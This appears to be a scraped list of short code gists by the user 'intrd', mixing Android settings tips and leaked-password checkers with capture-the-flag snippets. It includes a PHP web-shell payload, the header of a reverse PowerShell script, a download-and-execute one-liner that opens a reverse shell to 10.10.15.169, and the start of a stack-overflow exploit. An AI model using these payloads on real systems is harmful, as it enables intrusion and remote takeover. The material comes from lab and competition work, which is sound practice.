intrd

## go to settings:
* apps & notifications > app info > disable builtin google services/apps (home/chrome/gmail/assistant/googlefi/cloud print/services for ar/)
* battery usage > adaptive on
* battery usage > enable background restriction for everything
* special app access > batt optimization > all apps > choose apps > optimize on/off
* special app access > unrestricted data > choose apps on/off
* dev opt > disable animation scales (speed gain)
* acessibility > remove animations
* dev opt > picture color, disable sRGB
* dev opt > wifi throttling

intrd

## Haveibeenpwned mail leaked mass checker
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

# usage: python hpwned.py maillist.txt

import requests, json, time, sys

from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

intrd

## One-liner password leak check + k-anonymity method (w/out exposing the password on request)
# Compute the SHA1, Grab 1st 5 chars of the hash, check by range on huge haveibeenpwnd DB!
# original source: https://news.ycombinator.com/item?id=16432344

VARPWD='test123'; HASH=`echo -n $VARPWD | sha1sum`; curl --silent https://api.pwnedpasswords.com/range/`cut -b 1-5 <(echo $HASH)` --stderr - | grep -i `cut -b 6- <(echo $HASH) | cut -d ' ' -f 1`

intrd

## PHP : Winning the race condition vs Temporary File Upload - PHPInfo() exploit 
# Alternative way to easy_php @ N1CTF2018, solved by intrd & shrimpgo - p4f team
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

## passwords.txt payload content
# <?php $c=fopen('/app/intrd','w');fwrite($c,'<?php passthru($_GET["f"]);?>');?>

import sys,Queue,threading,hashlib,os, requests,  pickle, os.path, re
from subprocess import Popen, PIPE, STDOUT

intrd

#!/bin/bash

# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update

# remove previously installed Docker
sudo apt-get remove docker docker-engine docker.io* lxc-docker*

# install dependencies 4 cert

intrd

#Reverse powershell by Nikhil SamratAshok Mittal - https://github.com/samratashok/nishang

function Invoke-PowerShellTcp 
{ 
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target. 

.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch. 

intrd

# Powershell download & execute (anyver)
# http://dann.com.br/
# Invoke-PowerShellTcp.ps1 (Reverse powershell) - https://gist.github.com/intrd/d5086206bdef0ba1d7776c5325547626

powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3002

intrd

#!/usr/bin/python
## casino 2 - prog150 @ hackaflag 2017 - porto alegre
# @author intrd - http://dann.com.br/ + pwn4food team

# int_netcat.py: https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a

import re, sys, string, math, time, os, random
sys.path.append("../../LIBS")
from int_netcat import Netcat

intrd

## Solution for cry_t0k3n @ Global Cyberlympics Prequals 2017 (cryptcat multithread bruteforcer)
# @author intrd - http://dann.com.br/ 
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/

import sys,Queue,threading,hashlib,os,time
from subprocess import Popen, PIPE, STDOUT

NumOfThreads=5  
queue = Queue.Queue()

intrd

#!/usr/bin/python
## Sneaky box priv_esc XPL (ret2stack+nopsled+shellcode) @ hackthebox.eu
# @author intrd - http://dann.com.br/ 

import struct

exploit = "A"*362
#exploit += struct.pack("I",0xffffd638+10) #topstack local
#exploit += "\xCC"*4
exploit += struct.pack("I",0xbffff6e8+10) #topstack remote